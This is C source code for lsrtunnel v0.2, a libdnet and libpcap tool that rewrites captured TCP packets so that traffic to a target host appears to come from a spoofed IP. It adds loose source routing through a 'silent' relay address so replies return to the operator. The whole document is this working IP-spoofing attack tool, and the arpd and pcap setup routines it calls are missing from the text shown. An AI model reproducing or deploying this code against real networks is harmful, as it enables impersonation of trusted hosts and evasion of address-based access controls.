/* lsrtunnel v0.2 by Todd MacDermid */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <dnet.h>
#include <pcap.h>

#define FQDNMAX 8192
#define TMPBUFSIZE 1024
#define FILTERSIZE 8192
#define PACKETSIZE 65535
#define PACKETWAIT 300 

pid_t arpPid; /* To be killed off on exit */
int arpdLive = 1;

int forkArpd(struct addr *silentAddr);
int getIntInfo (struct addr *myAddr, struct intf_entry *intfEntry);

void usage(char *programName) {
  printf("usage: %s -i <silentIP> -t <targetIP> -f <spoofedIP>\n", programName);
  exit(0);
}

void killArpd() {
  kill(arpPid, SIGINT);
}

void childDies(int throwaway) {
  arpdLive = 0;
}

pcap_t * initPcap(struct addr *, struct addr *, struct addr *, struct addr *);
int processPacket(uint8_t *, struct addr *, struct addr *, struct addr *,
		  struct addr *, ip_t *);

int main(int argc, char **argv) {
  struct addr silentAddr, targetAddr, spoofedAddr, myAddr;
  int gotSilent, gotTarget, gotSpoofed, c;
  pcap_t *pcapPtr;
  uint8_t *packetBuf;
  struct pcap_pkthdr packetHead;
  struct intf_entry *intfEntry;
  uint8_t buf[TMPBUFSIZE];
  int linkHeadSize = ETH_HDR_LEN;
  ip_t *ipHandle;

  gotSilent = gotTarget = gotSpoofed = 0;
  if(!(getuid() == 0)) {
    printf("Gotta be root to run %s\n", argv[0]);
    return(-1);
  }
  
  /*
   * i: "silent" IP. All traffic passes through this IP
   * t: (to) target machine we are spoofing packets to.
   * f: (from) system we are claiming to be
   */

  while((c=getopt(argc, argv, "i:t:f:")) != -1) {
    switch (c) {
    case 'i':
      if ((addr_pton(optarg, &silentAddr)) < 0) {
	fprintf(stderr, "Cannot resolve silent IP %s\n", optarg);
	return(-1);
      }
      gotSilent++;
      break;
      
    case 't':
      if ((addr_pton(optarg, &targetAddr)) < 0) {
	fprintf(stderr, "Cannot resolve target IP %s\n", optarg);
	return(-1);
      }
      gotTarget++;
      break;

    case 'f':
      if ((addr_pton(optarg, &spoofedAddr)) < 0) {
	fprintf(stderr,"Cannot resolve silent IP %s\n", optarg);
	return(-1);
      }
      gotSpoofed++;
      break;

    default:
      usage(argv[0]);
    }
  }

  if(!(gotSpoofed && gotTarget && gotSilent)) 
    usage(argv[0]);

  if((ipHandle = ip_open()) == NULL) {
    fprintf(stderr, 
            "Cannot initialize socket (not root or unsupported interface)\n");
    return(-1);
  }

  intfEntry = (struct intf_entry *)buf;
  intfEntry->intf_len = TMPBUFSIZE;

  if((linkHeadSize = getIntInfo(&myAddr, intfEntry)) < 0) {
    fprintf(stderr, "Error reading interface info");
    exit(-1);
  }

  if ((arpPid = forkArpd(&silentAddr)) < 0) {
    fprintf(stderr, "Failed to set arp properly");
    exit(-1);
  }
  
  signal(SIGCHLD, childDies);
  atexit(killArpd);
  
  if((pcapPtr = initPcap(&silentAddr,&targetAddr,
			 &spoofedAddr,&myAddr)) == NULL) {
    fprintf(stderr,"error in initPcap\n");
    return(-1);
  }
  
  while(arpdLive) {
    packetBuf = (uint8_t *)pcap_next(pcapPtr, &packetHead);
    if(packetBuf != NULL) {
      packetBuf += linkHeadSize;
      processPacket(packetBuf, &silentAddr,&targetAddr,
		    &spoofedAddr,&myAddr, ipHandle);
    }
  }
  ip_close(ipHandle);
  return(0);
}

int getIntInfo (struct addr *myAddr, struct intf_entry *intfEntry) {
  intf_t *localInterface;
  pcap_t *pcapPtr;
  char *defaultInterface;
  char errbuf[PCAP_ERRBUF_SIZE];
  
  if((localInterface=intf_open()) == NULL) {
    fprintf(stderr, "intf_open failed");
    exit(-1);
  }

  if((defaultInterface = pcap_lookupdev(errbuf)) == NULL) {
    fprintf(stderr, "pcap_lookupdev failed: %s\n", errbuf);
    return(-1);
  }

  myAddr->addr_type = ADDR_TYPE_IP;
  strncpy(intfEntry->intf_name, defaultInterface, 59);

  if((intf_get(localInterface, intfEntry)) < 0) {
    fprintf(stderr, "intf_get failed\n");
    exit(-1);
  }
  
  memcpy(&(myAddr->addr_ip), &(intfEntry->intf_addr.addr_ip), IP_ADDR_LEN);
  myAddr->addr_bits = 32;

  if((pcapPtr = pcap_open_live(defaultInterface, PACKETSIZE, 1, PACKETWAIT,
			       errbuf)) == NULL) {
    fprintf(stderr, "pcap_open_live failed: %s\n",errbuf);
    return(-1);
  }

  pcap_close(pcapPtr);

  return(ETH_HDR_LEN);
} 

int processPacket(uint8_t *packetBuf, struct addr *silentAddr,
		  struct addr *remoteAddr, struct addr *spoofedAddr,
		  struct addr *myAddr, ip_t *ipHandle) {

  struct ip_hdr *ipHeader, *outIPHeader;
  struct tcp_hdr *tcpHeader, *outTCPHeader;
  uint8_t outPacket[PACKETSIZE];
  uint8_t *optPtr;
  int c;

  ipHeader = (struct ip_hdr *)packetBuf;
  outIPHeader = (struct ip_hdr *)outPacket;

  if(ipHeader->ip_p == IPPROTO_TCP) 
    tcpHeader = (struct tcp_hdr *)(packetBuf+(4*ipHeader->ip_hl));
  else {
    return(0);
  }

  bzero((char *)outPacket, PACKETSIZE);

  if ((ipHeader->ip_src == remoteAddr->addr_ip) &&
      (ipHeader->ip_dst == silentAddr->addr_ip)) {

    memcpy(outIPHeader, ipHeader, IP_HDR_LEN);
    outIPHeader->ip_src = silentAddr->addr_ip;
    outIPHeader->ip_dst = myAddr->addr_ip;
    /* strip all options */
    outIPHeader->ip_len = 
      htons(ntohs(ipHeader->ip_len) + 4*(5 - ipHeader->ip_hl));
    /*    printf("oldlen: %d  backlen: %d\n", ntohs(ipHeader->ip_len), ntohs(outIPHeader->ip_len)); */
    outIPHeader->ip_hl = 5;
    outTCPHeader = (struct tcp_hdr *)(outPacket + IP_HDR_LEN);
    memcpy(outTCPHeader, tcpHeader, (ntohs(ipHeader->ip_len)) - IP_HDR_LEN);
  } else if ((ipHeader->ip_src == myAddr->addr_ip) &&
	     (ipHeader->ip_dst == silentAddr->addr_ip)) {

    memcpy(outIPHeader, ipHeader, IP_HDR_LEN);
    outIPHeader->ip_src = spoofedAddr->addr_ip;
    outIPHeader->ip_dst = remoteAddr->addr_ip;
    outIPHeader->ip_hl = 7;
    outIPHeader->ip_len = 
      htons(ntohs(ipHeader->ip_len) + 4*(7 - ipHeader->ip_hl));

  /*  printf("oldlen: %d tolen: %d\n", ntohs(ipHeader->ip_len), ntohs(outIPHeader->ip_len)); */
    optPtr = ((uint8_t *)outIPHeader)+IP_HDR_LEN;

    *optPtr = IP_OPT_LSRR;
    optPtr++;
    *optPtr = 7;
    optPtr++;
    *optPtr = 8;
    optPtr++;
    memcpy (optPtr, &(silentAddr->addr_ip), IP_ADDR_LEN);

    outTCPHeader = (struct tcp_hdr *)(outPacket+28);

    memcpy(outTCPHeader, tcpHeader, (ntohs(outIPHeader->ip_len)) - 28);
  } else 
    return (0);
  
  
  ip_checksum(outPacket, ntohs(outIPHeader->ip_len));
  
  c = ip_send(ipHandle, outPacket, ntohs(outIPHeader->ip_len));
  /* printf("Sent: %d bytes\n", c); */

return(0);
}
